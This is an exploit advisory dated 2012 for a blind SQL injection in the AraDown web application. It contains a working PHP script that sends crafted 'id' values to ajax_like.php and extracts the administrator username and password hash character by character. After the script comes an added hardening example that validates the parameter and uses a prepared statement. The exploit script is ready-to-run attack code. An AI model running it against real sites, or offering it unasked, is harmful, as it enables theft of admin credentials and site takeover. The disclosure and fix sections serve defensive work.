AraDown Blind SQL Injection Exploit

Summary

AraDown suffers from a blind SQL injection vulnerability.

Credit:

The information has been provided by G-B.


Details

Vulnerable Systems:
 * AraDown Blind

<?php
echo "\n[*] Target -> ";

$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
// Marker present in the ajax_like.php response when the injected condition is false.
$marker = "<span class='on_img' align='center'></span>";

echo "[*] Username : ";

for($i=1;$i<=30;$i++){
    foreach($ar as $char){
        $b = send($target,"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
        // No character matched at position $i: the username is shorter than $i, stop.
        if(stripos($b,$marker) !== false && $char == 'z'){
            $i = 50;
            break;
        }
        if(stripos($b,$marker) !== false) continue;
        echo $char;
        break;
    }
}

echo "\n[*] Password : ";

for($i=1;$i<=32;$i++){
    foreach($ar as $char){
        $b = send($target,"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
        if(stripos($b,$marker) !== false) continue;
        echo $char;
        break;
    }
}

// POST the crafted id parameter to ajax_like.php and return the response body.
function send($target,$query){
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
    curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    $r = curl_exec($ch);
    curl_close($ch);
    return $r;
}

// Read one trimmed line from standard input.
function stdin(){
    $fp = fopen('php://stdin','r');
    $line = trim(fgets($fp));
    fclose($fp);
    return $line;
}
?>
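The application-side fix, added here as an example and not AraDown's own code: the id parameter that ajax_like.php reads from the POST body must be validated and bound as a query parameter instead of being spliced into the SQL text. The table and column names (items, likes), the shape of the weak query and the database connection parameters are assumptions; only ajax_like.php, the id parameter and the response marker come from the advisory.

```php
<?php
// Added hardening example, not AraDown's own code. Assumptions: ajax_like.php
// takes POST 'id' and looks up a like counter; table 'items' and column
// 'likes' are hypothetical names standing in for the real schema.

// Weak form (assumed shape of the original): the raw value is spliced into
// the SQL text, so an id such as "3' and (...)='a' # " rewrites the query
// and the presence or absence of the on_img marker becomes a yes/no oracle.
function like_count_weak(mysqli $db, string $id): ?int
{
    $res = $db->query("SELECT likes FROM items WHERE id='$id'");
    $row = $res ? $res->fetch_row() : null;
    return $row ? (int) $row[0] : null;
}

// Hardened form: reject anything that is not a plain integer, then bind the
// value as a parameter so it can never alter the query structure.
function like_count_safe(mysqli $db, string $id): ?int
{
    if (!preg_match('/^\d{1,10}$/', $id)) {
        // Log the rejected value: a stream of non-numeric ids against this
        // endpoint is the signature of the character-by-character loop above.
        error_log('ajax_like.php: rejected id ' . var_export($id, true));
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT likes FROM items WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($likes);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? (int) $likes : null;
}

// Endpoint entry point (hypothetical connection parameters).
$db = new mysqli('localhost', 'aradown_user', 'password', 'aradown');
$count = like_count_safe($db, $_POST['id'] ?? '');
if ($count !== null) {
    echo $count;
}
```

With the integer check in place, every probe the script above sends receives the same 400 response regardless of the injected condition, so the response no longer leaks one bit per request.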

Disclosure Timeline:
Published: 2012-08-08

Categories: Exploits